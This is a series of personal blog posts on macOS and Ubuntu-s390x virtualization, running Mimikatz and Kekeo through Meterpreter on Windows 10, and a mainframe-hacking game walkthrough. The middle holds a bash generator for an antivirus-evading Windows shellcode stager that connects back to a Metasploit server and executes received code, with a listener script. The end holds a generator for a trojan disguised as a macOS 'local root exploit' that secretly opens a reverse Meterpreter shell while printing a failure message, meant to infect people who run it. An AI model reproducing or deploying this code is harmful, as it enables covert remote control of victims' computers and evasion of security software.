A short post here that might help somebody struggling to install the latest MacOS in VirtualBox on Linux.  Im running VirtualBox 5.2.10 on X86_64 Linux. The process below can be replicated on Windows as well, but the networking part at the end will of course be different.

So lets first get the MacOS 10.13.4 iso (You can get the DMG and convert it to ISO, but I have little disk space now and just used a ready available ISO from the below link)

https://bit.ly/DownloadMacOSHS10134

Extract the rar and setup the new VM as follows in VirtualBox

Networking and other options are pretty straight forward, attach the extracted ISO as your boot media, and before we boot make sure to set these in the terminal

$ VBoxManage modifyvm "High Sierra" --cpuidset 00000001 000106e5 00100800 0098e3fd bfebfbff
$ VBoxManage setextradata "High Sierra" "VBoxInternal/Devices/efi/0/Config/DmiSystemProduct" "iMac11,3"
$ VBoxManage setextradata "High Sierra" "VBoxInternal/Devices/efi/0/Config/DmiSystemVersion" "1.0"
$ VBoxManage setextradata "High Sierra" "VBoxInternal/Devices/efi/0/Config/DmiBoardProduct" "Iloveapple"
$ VBoxManage setextradata "High Sierra" "VBoxInternal/Devices/smc/0/Config/DeviceKey" "ourhardworkbythesewordsguardedpleasedontsteal(c)AppleComputerInc"
$ VBoxManage setextradata "High Sierra" "VBoxInternal/Devices/smc/0/Config/GetKeyFromRealSMC" 1

Now boot the VM and the MacOS installer will come up after some time.

Setup the Disk first before installing (Erasing works the best if you don’t care about the defaults) via the Disk Utility

Exit the Disk Utility and Install MacOS, this takes approx 10 minutes and then suddenly reboots (for me this happens when its 2 minutes remaining)

Now if you don’t do anything the VM will reboot back to the installer, which we do not want. If that happens, simply power off the VM and remove the installation ISO. Now when you boot the VM again you get dropped to an EFI shell. You need to input the following commands to get this going further.

Shell> fs1:
FS1:\> cd "macOS Install Data"
FS1:\macOS Install Data\> cd "Locked Files"
FS1:\macOS Install Data\Locked Files\> cd "Boot Files"
FS1:\macOS Install Data\Locked Files\Boot Files\> boot.efi

Now this will boot and  continue with the installation and this time the setup will finish properly, but will take considerably more time than previous run.

And after some time you should have the new MacOS 10.13.4 High Sierra ready in you VirtualBox.

For Networking I choose the following script to help me interact with the VirtualBox VM and other VMs

#Setup tap and bridge 
tunctl -t tap0 -u user
ifconfig tap0 up
brctl addbr br0
brctl addif br0 eth0 vboxnet0 
brctl setfd br0 0
ifconfig eth0 10.0.2.1 up 
ifconfig br0 10.0.2.2 netmask 255.255.255.0 broadcast 10.0.2.255 up
brctl addif br0 tap0 vboxnet0 
ifconfig tap0 0.0.0.0
sysctl net.ipv4.ip_forward=1
iptables -A FORWARD --in-interface eth0 -j ACCEPT
iptables --table nat -A POSTROUTING --out-interface wlan0 -j MASQUERADE

And the networking on the VM is set as follows

And the Network configuration inside the MacOS VM is static as following:

First of all, kudos to @GentilKiwi for the Mimikatz and Kekeo. I have used Mimikatz since 2012 when I learned of its existence and first tried it.

Recently I have stumbled across a following Tweet and wondered how does the newest Windows 10 release behave (Windows 10.0.17134.48) when the below executes

The above  uses some obfuscation to rename various power shell functions in the notorious Invoke-Mimikatz.ps1 from PowerShell’s Mafia PowerSploit (https://github.com/PowerShellMafia/PowerSploit)  and directly the (https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1)

I have played a little with the above in the past and have described my modifications here (https://astr0baby.wordpress.com/2017/03/28/mimikatz-2-1-1-powershell-generator/)

In early 2018 Microsoft Defender started to pick the above up.  So I have fired up the VM again and updated with latest patches and performed the below tests to see if the PowerShell method works.

It seems that it does not anymore

So again only way I could get the latest Mimikatz to run on Windows 10 was via Meterpreter shell custom payload executable (which bypasses the Windows Defender)  generator below :

#!/bin/bash
clear
echo "****************************************************************"
echo " Automatic C source code generator - FOR METASPLOIT "
echo " Based on rsmudge metasploit-loader "
echo " PE32+ executable (GUI) x86-64 "
echo "****************************************************************" 
echo -en 'Metasploit server IP : ' 
read ip
echo -en 'Metasploit port number : ' 
read port

echo '#include <stdio.h>'> temp.c 
echo '#include <stdlib.h>' >> temp.c 
echo '#include <winsock2.h>' >> temp.c
echo '#include <windows.h>' >> temp.c 
echo -n 'unsigned char lambert[]="' >> temp.c 
echo -n $ip >> temp.c 
echo -n '";' >> temp.c 
echo '' >> temp.c 
echo -n 'unsigned char omega[]="' >> temp.c 
echo -n $port >> temp.c 
echo -n '";' >> temp.c 
echo '' >> temp.c 
echo 'void winsock_init() {' >> temp.c 
echo ' WSADATA wsaData;' >> temp.c 
echo ' WORD wVersionRequested;' >> temp.c 
echo ' wVersionRequested = MAKEWORD(2, 2);'>> temp.c 
echo ' if (WSAStartup(wVersionRequested, &wsaData) < 0) {' >> temp.c 
echo ' printf("bad\n"); '>> temp.c 
echo ' WSACleanup(); '>> temp.c 
echo ' exit(1);'>> temp.c 
echo ' }' >> temp.c 
echo ' }' >> temp.c 
echo ' void punt(SOCKET my_socket, char * error) {' >> temp.c 
echo ' printf("r %s\n", error);'>> temp.c 
echo ' closesocket(my_socket);'>> temp.c 
echo ' WSACleanup();'>> temp.c 
echo ' exit(1);' >> temp.c 
echo ' }' >> temp.c 
echo ' int recv_all(SOCKET my_socket, void * buffer, int len) {' >> temp.c 
echo ' int tret = 0;'>> temp.c 
echo ' int nret = 0;'>>temp.c 
echo ' void * startb = buffer;'>> temp.c 
echo ' while (tret < len) {'>>temp.c 
echo ' nret = recv(my_socket, (char *)startb, len - tret, 0);'>> temp.c 
echo ' startb += nret;'>> temp.c 
echo ' tret += nret;'>>temp.c 
echo ' if (nret == SOCKET_ERROR)'>> temp.c 
echo ' punt(my_socket, "no data");'>> temp.c 
echo ' }'>>temp.c 
echo ' return tret;'>> temp.c 
echo '}' >> temp.c 
echo 'SOCKET wsconnect(char * targetip, int port) {'>> temp.c 
echo ' struct hostent * target;' >> temp.c 
echo ' struct sockaddr_in sock;' >> temp.c
echo ' SOCKET my_socket;'>>temp.c 
echo ' my_socket = socket(AF_INET, SOCK_STREAM, 0);'>> temp.c 
echo ' if (my_socket == INVALID_SOCKET)'>> temp.c 
echo ' punt(my_socket, ".");'>>temp.c 
echo ' target = gethostbyname(targetip);'>>temp.c 
echo ' if (target == NULL)'>>temp.c 
echo ' punt(my_socket, "..");'>>temp.c 
echo ' memcpy(&sock.sin_addr.s_addr, target->h_addr, target->h_length);'>>temp.c 
echo ' sock.sin_family = AF_INET;'>> temp.c 
echo ' sock.sin_port = htons(port);'>>temp.c 
echo ' if ( connect(my_socket, (struct sockaddr *)&sock, sizeof(sock)) )'>>temp.c 
echo ' punt(my_socket, "...");'>>temp.c 
echo ' return my_socket;'>>temp.c 
echo '}' >> temp.c 
echo 'int main(int argc, char * argv[]) {' >> temp.c 
echo ' FreeConsole();'>>temp.c 
echo ' Sleep(15);'>>temp.c 
echo ' ULONG32 size;'>>temp.c 
echo ' char * buffer;'>>temp.c 
echo ' void (*function)();'>>temp.c 
echo ' winsock_init();'>> temp.c 
echo ' SOCKET my_socket = wsconnect(lambert, atoi(omega));'>>temp.c 
echo ' int count = recv(my_socket, (char *)&size, 4, 0);'>>temp.c 
echo ' if (count != 4 || size <= 0)'>>temp.c 
echo ' punt(my_socket, "error lenght\n");'>>temp.c 
echo ' buffer = VirtualAlloc(0, size + 5, MEM_COMMIT, PAGE_EXECUTE_READWRITE);'>>temp.c 
echo ' if (buffer == NULL)'>>temp.c 
echo ' punt(my_socket, "error in buf\n");'>>temp.c 
echo ' buffer[0] = 0xBF;'>>temp.c 
echo ' memcpy(buffer + 1, &my_socket, 4);'>>temp.c 
echo ' count = recv_all(my_socket, buffer + 5, size);'>>temp.c 
echo ' function = (void (*)())buffer;'>>temp.c 
echo ' function();'>>temp.c 
echo ' return 0;'>>temp.c 
echo '}' >> temp.c 
echo '(+) Compiling binary ..' 
x86_64-w64-mingw32-gcc temp.c -o payload.exe -lws2_32 -mwindows 
ls -la temp.c
#strip payload.exe 
file=`ls -la payload.exe` ; echo '(+)' $file

And the Listener for the above :

#!/bin/bash
clear
echo "***************************************************************"
echo "      Automatic Listener generator - FOR METASPLOIT "
echo "***************************************************************"
echo -e "What IP are we gonna listen to ? \c"
read host
echo -e "What Port Number are we gonna listen to? : \c"
read port
echo "Starting the meterpreter listener.."
echo -n './msfconsole -x "use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter/reverse_tcp ; set LHOST ' > run.listener.sh 
echo -n $host >> run.listener.sh 
echo -n '; set LPORT ' >> run.listener.sh 
echo -n $port >> run.listener.sh 
echo -n '; run"' >> run.listener.sh 
chmod +x run.listener.sh 
./run.listener.sh

We can still get a reliable execution and direct memory injection via meterpreter

meterpreter> execute -H -i -c -f /home/user/metasploit-framework/mimikatz.exe -m -d calc.exe

And speaking of Kekeo (not many people run it so I have decided to include it in my tests)  here we run it against latest patched Windows 10

meterpreter> execute -H -i -c -f /home/user/metasploit-framework/kekeo.exe -m -d calc.exe

Had a great time playing through the amazing game created by Phil Young (Soldier of Fortran @mainframed767). What makes thing project amazing is that it was written in HyperCard 2.4 and runs only on the old Apple Macintosh systems (Macintosh 7.0.1) as seen in a screenshot below. So getting into it requires a dedication that a “hacker” should have. The idea is brilliant and introduces people to the concept of Mainframe hacking (many people don’t even know what Mainframes were or are )

The game can be played online from Archive.org’s simulation here https://archive.org/details/MainframeHackingCYOA  or local if you download the images from Archive.org

https://archive.org/download/MainframeHackingCYOA/HyperCardBootSystem7.img 
https://archive.org/download/MainframeHackingCYOA/MainframeHacker.img

You can use the minivmac (https://github.com/jsdf/minivmac) or the pce (http://www.hampa.ch/pce/download.html) both work fine for the MainframeHackingCYOA. I have managed to run the game on simulated Alpha DS25 via alphavm or on a MIPS CI20 development board (running the retro CDE)

Since we got this far I wanted to take an opportunity to describe my experience during the gameplay and show some interesting points this game makes. Again big thanks to Soldier of Fortran for this gem !

We start the game simply by being curious.  I recommend to go through this yourself .. before reading the below.

And enter the Cyberspace

Who would not like to pick up a phone like the Matrix dudes did  ?

OPSEC at its best

Lets Dial in – no time for bed

Honestly who remembers the BBS days ? Seems like eons ago.

If you are using a non Macintosh keyboard, the zxcvbnm,./ keys are shifted by one to the right.

So we check what is available for reading

Interesting E Corp … and the logo :)  Mr. Robot style :)  and a password ECoprp@18 but no username …..

And here are the instructions from the SYSOP what to do.

So off we go to Connect

Now this is quite informative. Nmap, Metasploit and Hydra is a daily bread to any security researcher but  c3270( curses-based IBM host access tool) not so much (http://x3270.bgp.nu/download.html)

So we first run an nmap scan and probe open ports to determine service/version info and start hacking…

Here we learn briefly about TSO, CICS and the VTAM on the Mainframes and the corresponding nmap NSE scripts that can be used for enumeration. Lets check that telnet port first …

So we ran the VTAM enumeration against the telnet port 23 we have found earlier and learn about the TSOPRD, TSODEV, CICSPRD1 and CICSPRD2  applids. We can use the information to enumerate the CICS on the Mainframe as seen below. Remember that we have a password from the leaked Ecorp document off the BBS ( ECorp@18) so we use these credentials for CICS enumeration here … Lets query the TSODEV and see what  information comes out.

To get the list of valid usernames we can use FTP brute via  Hydra in this example to bruteforce using the known password (ECorp@18)

So here we get a list of valid users ” x003 , x888 and x420 ” OK, we have gathered enough information so we can get to the final stage of attacking TSO and CICS

Now if you get lucky and choose a privileged user from the above you can finish the game quickly .. x420 looks like it must have some weight …  what I did however was using x003 and TSO attack

Before we priv escalate lets search  the Warnings

SYS1.PARMLIB is in WARN mode ..hmm  .. what does search BPX.* reveal ?

Not much rights there, so lets see what we get from SURROGAT

I knew it x420 must have some higher powers. So we try the last possibility here APF Authorized

Escalate Privileges … (man I wish hacking was this easy ..)

But I got stuck here .. maybe I have done something wrong .. but there was no way to go back from this screen and I suspect this to be a deadlock. Only thing at this moment was to reload the simulation and start over … since I already got the info that x420 will be the super user … I went straight into attacking the CICS  -> starting over

And skipping to the CICS part… this time we use the x420 user and the ECorp@18 creds

heh ..another user x525 … lets see what CICSPwn brings

Reverse Shell nothing ….

Bind shell gets through

And sending the Result

Thank you @mainframed767  this was fun to play through (a little tricky with the keyboard shift… but fun)

So we have learned a few things here … time to study the above code from this git repo github.com/ayoul3

https://github.com/ayoul3/cicspwn 
https://github.com/ayoul3/Privesc
https://github.com/ayoul3/Rexx_scripts
https://github.com/ayoul3/JCL_scripts
https://github.com/ayoul3/wc3270_hacked

Here are the @mainframed767  Youtube resources about Mainframe security

And maybe starting to learn from scratch using HERCULES https://github.com/hercules-390/hyperion

Honestly I had very little interest in the IBM Z mainframe computers (zEC12 and up)  ( https://en.wikipedia.org/wiki/IBM_zEC12_(microprocessor)) but recently Mainframes caught my interest (Thanks to Soldier of FORTRAN  @mainframed767     https://mainframed767.tumblr.com/)

So lets see if we can run Mainframe Ubuntu on our laptop running X86_64 Linux distribution (Mint 18.3)  We will need a couple of things to prepare the environment before we move onto the simulations.

First lets download the Ubuntu installation media for the S390X architecture from here https://wiki.ubuntu.com/S390X#Downloads

First thing that is interesting is the statement that Ubuntu S390X cannot be run nor has any support in simulators like Hercules, which we will prove as wrong in next steps.

After filling up some registration details you will get to the download link or just grab directly from here http://cdimage.ubuntu.com/releases/18.04/release/ubuntu-18.04-server-s390x.iso

Next we will need to download and compile Hercules from https://github.com/hercules-390/hyperion You will need all the standard Linux build tools (build-essential, cmake and a few -dev packages that the cmake will report that its missing) All this is available on the standard Linux Mint 18.3 apt repositories.

Lest create a working environment for this in our home dir 
==========================================================

$ mkdir -p ~/MAINFRAME/
$ cd ~/MAINFRAME
$ git clone https://github.com/hercules-390/hyperion
$ cd hyperion
$ mkdir build
$ cd build
$ cmake ..

If all dependencies were met the following will be visible 
-------------------------------------------------------------------
Install prefix /usr/local
Executable directory bin
Library directory lib
Modules directory lib
Data Directory (http) /usr/local/share/Hercules
Source directory /home/user/MAINFRAME-STUFF/hyperion
Build directory /home/user/MAINFRAME-STUFF/hyperion/build
Generator: Unix Makefiles
Build command line: /usr/bin/make
C compiler version: GNU 5.4.0
C options (Release): -DHAVE_CONFIG_H -g3 -ggdb3 -DNDEBUG -O2 -march=native -minline-stringops-dynamically
C options (Debug): -DHAVE_CONFIG_H -g3 -ggdb3 -g
Install RPATH: $ORIGIN/../lib
Large file support: Using native large file support.
Hercules link libs: m;dl
Target processor: x86_64
-------------------------------------------------------------------

$ make 
$ sudo su 
# make install

Prepare the Mainframe directory structure for Ubuntu Hercules simulation

$ mkdir -p ~/MAINFRAME/ubuntu/dasd
$ cd ~/MAINFRAME/ubuntu/dasd
$ dasdinit -lfs -linux ubuntu.disk 3390-3 LIN120 (this creates 2.8 GB disk )

If you need more you can add additional value at the end of this command

$ dasdinit -lfs -linux ubuntu.disk 3390-3 LIN120 8000 (this creates 6.8 GB disk )

Alternatively, if you want to save disk space at the expense of some run-time overhead,
you can use zlib or bz2 compressed DASDs by using the -z or -bz2 arguments, respectively. For example,

$ dasdinit -z -lfs -linux ubuntu.disk 3390-3 LIN120

Next we need to prepare the Ubuntu s390x hercules.cnf configuration file

$ cd ~/MAINFRAME/ubuntu
$ vi hercules.cnf

I have observed that the Debian 9.4 hercules.cnf does not work with Ubuntu 18.04

CPUSERIAL 002623
CPUMODEL 2086
MAINSIZE 2048 
XPNDSIZE 2048
NUMCPU 2 
MAXCPU 2 
OSTAILOR LINUX
PANRATE SLOW
ARCHMODE ESAME

# Display Terminals

0700 3270
0701 3270


# dasd
0120 3390 ./dasd/debian.disk
# network
0A00,0A01 CTCI -n /dev/net/tun -t 1500 192.168.11.100 192.168.11.4

So if you even try to use the above Hercules will complain when loading the Ubuntu config

So use the below configuration for your hercules.cnf

And enter the following configuration and save (This is important since the configuration sample used from Debian won’t work)  Adjust the number of CPUs below to match your system since I have used 4 CPUs here NUMCPU 4

ARCHMODE z/Arch
ALRF ENABLE
CCKD RA=2,RAQ=4,RAT=2,WR=2,GCINT=5,GCPARM=0,NOSTRESS=0,TRACE=0,FREEPEND=-1
CNSLPORT 3270
CONKPALV (3,1,10)
CPUMODEL 3090
CPUSERIAL 012345
DIAG8CMD ENABLE
ECPSVM YES
LOADPARM 0A95DB..
LPARNAME HERCULES
MAINSIZE 1024
MOUNTED_TAPE_REINIT DISALLOW
NUMCPU 4
OSTAILOR Z/OS
PANRATE 80
PGMPRDOS LICENSED
SHCMDOPT NODIAG8
SYSEPOCH 1900
TIMERINT 50
TZOFFSET +1400
YROFFSET 0

# Display Terminals

0700 3270
0701 3270

# dasd
0120 3390 ./dasd/ubuntu.disk

# network
0A00,0A01 CTCI -n /dev/net/tun -t 1500 192.168.11.100 192.168.11.4

I am using my network configuration (yours will probably be different so it should be adjusted to your needs) A little explanation of the above #network definition

192.168.11.100 will be the tun virtual Ubuntu x390x inside Hercules
192.168.11.4   is an IP address I have assigned to my wireless interface wlp9s0

And create a networking script to start prior the Hercules simulation so that we can use the network inside our simulator. I have called this network.sh

$ vi ~/MAINFRAME/ubuntu/network.sh

And enter the following.

#Depending on your system replace the following 
# enp0s25 = eth0 
# wlp9s0  = wlan0 
#Setup tap and bridge
tunctl -t tap0 -u user
ifconfig tap0 up
brctl addbr br0
brctl addif br0 enp0s25
brctl setfd br0 0
ifconfig enp0s25 10.0.2.1 up
ifconfig br0 10.0.2.2 netmask 255.255.255.0 broadcast 10.0.2.255 up
brctl addif br0 tap0
ifconfig tap0 0.0.0.0
sysctl net.ipv4.ip_forward=1
iptables -A FORWARD --in-interface enp0s25 -j ACCEPT
iptables --table nat -A POSTROUTING --out-interface wlp9s0 -j MASQUERADE

Execute the above network.sh script (you need root privs) before starting the Hercules simulator.

$ sudo su 
# ./network.sh

Mount the downloaded Ubuntu server iso

# mnt -o loop /path/to/iso/ubuntu-18.04-server-s390x.iso /mnt

And execute the Hercules Ubuntu simulator in

$ cd ~/MAINFRAME/ubuntu
$ sudo su
# hercules -f hercules.cnf

You should see something similar to this >

HHC00346I gcparm=0,nostress=0,freepend=-1,fsync=0,linuxnull=0,trace=0
HHC02204I conkpalv set to (3,1,10)
HHC02204I cpumodel set to 3090
HHC02204I cpuserial set to 012345
HHC02204I ecpsvm set to enabled, trap support enabled
HHC02204I loadparm set to 0A95DB..
HHC02204I lparname set to HERCULES
HHC17003I MAIN storage is 1G (mainsize); storage is not locked
HHC02204I mounted_tape_reinit set to disabled
HHC00109I Thread CPU Time is available; _POSIX_THREAD_CPUTIME=0
HHC00100I Thread id 00007f1d0fb69700, prio 15, name Processor CP01 started
HHC00811I Processor CP01: architecture mode z/Arch
HHC00109I Thread CPU Time is available; _POSIX_THREAD_CPUTIME=0
HHC00100I Thread id 00007f1d0fa68700, prio 15, name Processor CP02 started
HHC00811I Processor CP02: architecture mode z/Arch
HHC00109I Thread CPU Time is available; _POSIX_THREAD_CPUTIME=0
HHC00100I Thread id 00007f1d0f764700, prio 15, name Processor CP03 started
HHC00811I Processor CP03: architecture mode z/Arch
HHC02204I numcpu set to 4
HHC02204I panrate set to 80
HHC02204I shcmdopt set to Enabled NoDiag8
HHC02204I timerint set to 50
HHC02204I tzoffset set to +1400
HHC02204I yroffset set to 0
HHC00100I Thread id 00007f1d0f452700, prio 4, name Console connection started
HHC00414I 0:0120 CKD file ./dasd/ubuntu.disk: cyls 3339 heads 15 tracks 50085 trklen 56832
HHC01024I Waiting for console connections on port 3270
HHC00901I 0:0A00 CTCI: Interface tun0 type TUN opened
HHC00100I Thread id 00007f1d12623740, prio 0, name Control panel started
herc =====>

The herc =====> is important … this is our Mainframe prompt which we will now use inside Hercules to configure the Ubuntu Server.

Type the following to load the installer from our mounted iso.

herc =====> ipl /mnt/ubuntu.ins

After approx 90 seconds the installation will load and we get to the first step of the S390X configuration – Network

What is very important here is to understand how to enter command line options to the herc prompt. Always use a “dot” . before any command in herc prompt. We want to use ctc (Channel to Channel connection here)

herc =====> .1  and  confirm hit ENTER

Now, you have to define the end-points for this virtual network interface: Select read ctc device:   herc =====> .1  and  confirm hit ENTER

Now choose the CTC write device herc =====> .2  and  confirm hit ENTER

We do not want to use DHCP so set herc =====> .2 and confirm hit ENTER

Enter the guest IP  herc =====> .192.168.11.100  and confirm hit ENTER

Next define netmask herc =====> .255.255.255.0 and confirm hit ENTER 

Next we define our gateway herc =====> .192.168.11.1 and confirm hit ENTER , please note that this is my actual gateway for wireless interface, so adjust accordingly

Define DNS servers , just use Google since we are ipforwarding and masquerading anyway  herc =====> .8.8.8.8 and confirm hit ENTER

Now we come to name our new S390x system herc =====> .ubuntu-framed and confirm hit ENTER , again use your imagination here.

Define domain name (does not really matter) herc =====> .virtual and confirm hit ENTER

Now comes the important part, defining the password for the installation session (yes you will login to the simulated S390X Ubuntu via ssh from your laptop and continue the setup from there) herc =====> .password and confirm hit ENTER , choose your own password.

Congratulations if you got this far, we are ready to start the actual installation !

Now ssh from your Linux machine to the simulated S390X Ubuntu and use the credentials you have defined before

$ ssh installer@192.168.11.100

And the familiar pink/purple Ubuntu Server NCURSES installer will pop-up. From now on its pretty much straight forward Ubuntu installation procedure. I am not going to cover the exact steps ( you can get all the juicy details from https://wiki.ubuntu.com/S390X/Installation%20In%20LPAR for example)

Don’t install any X stuff, just keep it basic (OpenSSH server and Basic Ubuntu Server) and be patient, the installation can take some time ( 2 to 3 hours on Core i5 8 GB RAM Panasonic Toughbook CF-53)

*You can switch between the Hercules modes via Escape key to see the CPU details

And finally we get to the end

And the main Hercules console will look like this when the system installer shuts down

So we are now ready to boot our new Ubuntu 18.04 S390X Mainframe system !

In the Hercules console hit ESCAPE and and hit “l” and “c” to boot the new system, to get  back to the console display hit ESCAPE again

Typical display in Hercules simulator

Once you see that the Secure Shell server has started , you can then ssh to your S390X server from Linux  (depends on what you defined your Ubuntu user do the following)

ssh user@192.168.11.100

Congratulations again ! You are running a Mainframe Ubuntu 18.04 Linux S390X via Hercules simulator !

I would like to thank the following sources of information that helped me through the above http://www.josefsipek.net/docs/s390-linux/hercules-s390.html

A little update (since I have not found a reliable way how to upgrade the existing High Sierra pre 10.13.5 in VirtualBox) is to follow the exact same steps as mentioned here

https://astr0baby.wordpress.com/2018/04/22/installing-high-sierra-10-13-4-in-virtualbox-5-x/

With these exceptions

Download MacOS 10.13.5 iso from here -> https://drive.google.com/file/d/1_wnCdMKB4_GQM9dtA4AOHxZ21NCGFNm9/view

When you get the UEFI prompt follow the same steps, but boot via boot command only once in the correct UEFI directory as seen in the screenshot below

This will install High Sierra 10.13.5

And fresh xcode gcc

Another exercise that you might find useful. Art of deception. Creating fakes. Fake exploits that exploit those who execute it. And we learn how to fork() :)

Our target will be MacOS 10.13.5, we will be using Metasploit framework and some custom C code to get the fake stuff look like an exploit failing (while in fact it spawns a reverse TCP Meterpreter shell :))

Here is my sample code generator  (Put this in metasploit path and make executable)

clear 
echo "************************************************************"
echo " Automatic shellcode generator - FOR METASPLOIT "
echo " For OSX 64bit Antivirus bypass (Avast) " 
echo " And to get Script Kiddies infected :) " 
echo "************************************************************"
echo -e "What IP are we gonna use ? \c"
read IP 
echo -e "What Port Number are we gonna listen to? : \c"
read port
echo '[*] Checking if metasploit msfvenom is present..'
if [ -x ./msfvenom ]; then
echo '[*] Found msfvenom in current path ........ good'
else
echo '[-] No msfvenom in path...make sure you have this script in your metasploit-framework path'
exit 0
fi 
echo '[*] Cleaning up ' 
rm -f osx64-payload.c
./msfvenom -p osx/x64/meterpreter/reverse_tcp EXITFUNC=process LHOST=$IP LPORT=$port -a x64 --platform OSX -e x64/xor -f c -o test.c
echo "#include <stdio.h>" > temp.c 
echo '#include <sys/types.h>' >> temp.c
echo '#include <sys/ipc.h>' >> temp.c
echo '#include <sys/msg.h>' >> temp.c
echo '#include <string.h>' >> temp.c
echo '#include <sys/mman.h>' >> temp.c
echo '#include <fcntl.h>' >> temp.c
echo '#include <sys/socket.h>' >> temp.c
echo '#include <stdlib.h>' >> temp.c
echo '#include <errno.h>' >> temp.c
echo '#include <sys/mman.h>' >> temp.c
echo '#include <sys/types.h>' >> temp.c
echo '#include <sys/stat.h>' >> temp.c
echo '#include <sys/ioctl.h>' >> temp.c
echo '#include <unistd.h>' >> temp.c
echo '#include <strings.h>' >> temp.c
echo '#include <unistd.h>' >> temp.c
echo '#include <poll.h>' >> temp.c
echo '#include <pthread.h>' >> temp.c 
echo '#include <stdint.h>' >> temp.c 
echo '' >> temp.c 
cat test.c >> temp.c 
echo '' >> temp.c
echo 'void genlol();' >> temp.c
echo 'int random_in_range (unsigned int min, unsigned int max);' >> temp.c
echo 'int random_in_range (unsigned int min, unsigned int max)' >> temp.c
echo '{' >> temp.c 
echo 'int base_random = rand();' >> temp.c 
echo 'if (RAND_MAX == base_random){' >> temp.c
echo 'return random_in_range(min, max);' >> temp.c 
echo '}' >> temp.c
echo 'int range = max - min,' >> temp.c
echo 'remainder = RAND_MAX % range,' >> temp.c
echo 'bucket = RAND_MAX / range;' >> temp.c
echo 'if (base_random < RAND_MAX - remainder) {' >> temp.c
echo 'return min + base_random/bucket;' >> temp.c
echo '} else {' >> temp.c
echo 'return random_in_range (min, max);' >> temp.c
echo '}' >> temp.c
echo '}' >> temp.c
echo 'char* rev(char* str)' >> temp.c
echo '{' >> temp.c
echo 'int end=strlen(str)-1;' >> temp.c
echo 'int i;' >> temp.c
echo 'for(i=5; i<end; i++)' >> temp.c
echo '{' >> temp.c 
echo 'str[i] ^= 1;' >> temp.c
echo '}' >> temp.c
echo 'return str;' >> temp.c
echo '}' >> temp.c
echo 'int main(int argc, char **argv)' >> temp.c
echo '{' >> temp.c
echo 'system ("clear");' >> temp.c
echo 'printf ("====================================\n");' >> temp.c
echo 'printf ("Local root exploit for MacOS 10.13.5\n");' >> temp.c
echo 'printf ("====================================\n");' >> temp.c
echo 'printf ("[*] Checking IOConsoleUsers\n");' >> temp.c
echo 'system("/bin/sleep 1");' >> temp.c
echo 'printf(".");' >> temp.c
echo 'fflush(stdout);' >> temp.c
echo 'system("/bin/sleep 1");' >> temp.c
echo 'printf("..");' >> temp.c
echo 'fflush(stdout);' >> temp.c
echo 'system("/bin/sleep 1");' >> temp.c
echo 'printf("...");' >> temp.c
echo 'fflush(stdout);' >> temp.c
echo 'system("/bin/sleep 1");' >> temp.c
echo 'printf("....");' >> temp.c
echo 'printf ("\n[*] Found IOCosoleUsers address gap!\n");' >> temp.c
echo 'printf ("\n[*] Spawning root shell\n");' >> temp.c
echo 'pid_t process_id = 0;' >> temp.c
echo 'pid_t sid = 0;' >> temp.c
echo 'process_id = fork();' >> temp.c
echo 'if (process_id < 0)' >> temp.c
echo '{' >> temp.c
echo 'printf("fork failed!\n");' >> temp.c
echo 'exit(1);' >> temp.c
echo '}' >> temp.c
echo 'if (process_id > 0)' >> temp.c
echo '{' >> temp.c
echo 'printf("[-] Exploit failed due to invalid PID %d IOConsoleUsers \n", process_id);' >> temp.c
echo 'exit(0);' >> temp.c
echo '}' >> temp.c
echo 'void *ptr = mmap(0, 0x2000, PROT_WRITE|PROT_READ|PROT_EXEC, MAP_ANON | MAP_PRIVATE, -1, 0);' >> temp.c
echo 'memcpy(ptr,buf,sizeof buf);' >> temp.c
echo 'void (*fp)() = (void (*)())ptr;' >> temp.c
echo 'fp();' >> temp.c
echo 'printf ("\n[-] Exploit failed \n");' >> temp.c
echo '}' >> temp.c
echo 'void genlol(){' >> temp.c
echo 'int num1, num2, num3;' >> temp.c
echo 'num1=100;' >> temp.c
echo 'while (num1<=5) {' >> temp.c
echo 'num1=random_in_range(0,10000);' >> temp.c
echo 'num2=random_in_range(0,10000);' >> temp.c
echo 'num3=random_in_range(0,10000);' >> temp.c
echo 'printf ("\n[*] /bin/bash exec 0 \n");' >> temp.c
echo 'printf ("\n[*] R00t3d by 1337 h4x0rz \n");' >> temp.c
echo '}' >> temp.c
echo '}' >> temp.c
mv temp.c osx64-payload.c
if [ -f ./osx64-payload.c ]; then
echo '[*] osx64-payoad.c generated ...'
ls -la osx64-payload.c
else
echo '[-] Something went wrong .. '
exit 0
fi

This will generate a file called osx64-payload.c with our callback Meterpreter IP and port we have chosen. Now we can present the code as super 1337 MacOS local root exploit to the script-kiddie audience (whoever writes C code will see this straight away ;) )

Once the Script-kiddie compiles the code on its latest MacOS 10.13.5 it will run/fail .. but we will get a reverse shell on our listener machine :)

Our listener code :  (place in metasploit path and make executable)

#!/bin/bash
clear
echo "***************************************************************"
echo " Automatic shellcode generator - FOR METASPLOIT "
echo " For Automatic Teensy programming and deployment "
echo "***************************************************************"
echo -e "What IP are we gonna listen to ? \c"
read host
echo -e "What Port Number are we gonna listen to? : \c"
read port
echo "Starting the meterpreter listener.."
echo -n './msfconsole -x "use exploit/multi/handler; set PAYLOAD osx/x64/meterpreter/reverse_tcp; set LHOST ' > run.listener.sh 
echo -n $host >> run.listener.sh 
echo -n '; set LPORT ' >> run.listener.sh 
echo -n $port >> run.listener.sh 
echo -n '; run"' >> run.listener.sh 
chmod +x run.listener.sh 
./run.listener.sh

Evil , no ?

Here is the video of the above

Since the MacOS system updates (minor version upgrade) do not work in Virtual Box (maybe somebody got it going, it does not work for me) I have decided to get my own Mac Mini and produce a usable MacOS ISO for installation in Virtual Box whenever a new version comes out.

I have followed this blog post to create the ISO for High Sierra 10.13.6 https://tylermade.net/2017/10/05/how-to-create-a-bootable-iso-image-of-macos-10-13-high-sierra-installer/

So there are no hacks involved in the ISO, all is valid stuff from Apple.

So on the freshly updated MacOS I have executed the following

hdiutil create -o /tmp/HighSierra.cdr -size 5200m -layout SPUD -fs HFS+J
hdiutil attach /tmp/HighSierra.cdr.dmg -noverify -mountpoint /Volumes/install_build
sudo /Applications/Install\ macOS\ High\ Sierra.app/Contents/Resources/createinstallmedia --volume /Volumes/install_build 
mv /tmp/HighSierra.cdr.dmg ~/Desktop/InstallSystem.dmg 
hdiutil detach /Volumes/Install\ macOS\ High\ Sierra 
hdiutil convert ~/Desktop/InstallSystem.dmg -format UDTO -o ~/Desktop/HighSierra.iso

Today @harmj0y from SpectreOps released to the public his and the other team-members tools called the GhostPack  http://github.com/GhostPack/

